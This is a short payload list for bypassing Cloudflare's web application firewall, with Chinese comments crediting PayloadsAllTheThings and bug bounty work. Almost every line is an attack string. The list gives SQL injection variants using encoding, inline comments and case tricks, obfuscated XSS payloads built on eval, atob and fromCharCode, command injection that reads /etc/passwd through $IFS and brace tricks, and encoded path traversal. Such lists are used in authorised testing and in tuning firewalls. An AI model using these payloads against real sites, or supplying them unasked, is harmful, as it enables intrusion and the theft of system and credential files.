# Cloudflare WAF Bypass Payloads
# 来源: PayloadsAllTheThings, Bug Bounty经验
# Cloudflare WAF绕过技术

# === SQL注入绕过 ===
# 科学计数法
' or 1.e('')='
1' or 1.e(1) or '1'='1
' or 1.e(1)='1

# 条件注释
/*!50000UNION*//*!50000SELECT*/1,2,3--
' /*!50000AND*/ 1=1--
' /*!50000OR*/ 1=1--
/*!UNION*//*!SELECT*/1,2,3--

# 空格替代
'/**/OR/**/1=1--
'%09OR%091=1--
'%0aOR%0a1=1--
'+OR+1=1--
'%a0OR%a01=1--

# 大小写混合
' UnIoN SeLeCt 1,2,3--
' oR 1=1--
' AnD 1=1--

# 双写绕过
' UUNIONNION SSELECTELECT 1,2,3--
' OORR 1=1--

# 编码绕过
%27%20OR%20%271%27%3D%271
%252527%2520OR%25201=1--

# 宽字节
%bf%27 OR 1=1--
%bf' OR 1=1--

# === XSS绕过 ===
<svg/onload=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=\u0061lert(1)>
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<svg onload=alert&lpar;1&rpar;>
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

# === 命令注入绕过 ===
;cat${IFS}/etc/passwd
;cat$IFS/etc/passwd
;{cat,/etc/passwd}
;cat</etc/passwd
;c\at /e\tc/pa\sswd
;who$@ami
;who$()ami

# === 路径遍历绕过 ===
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
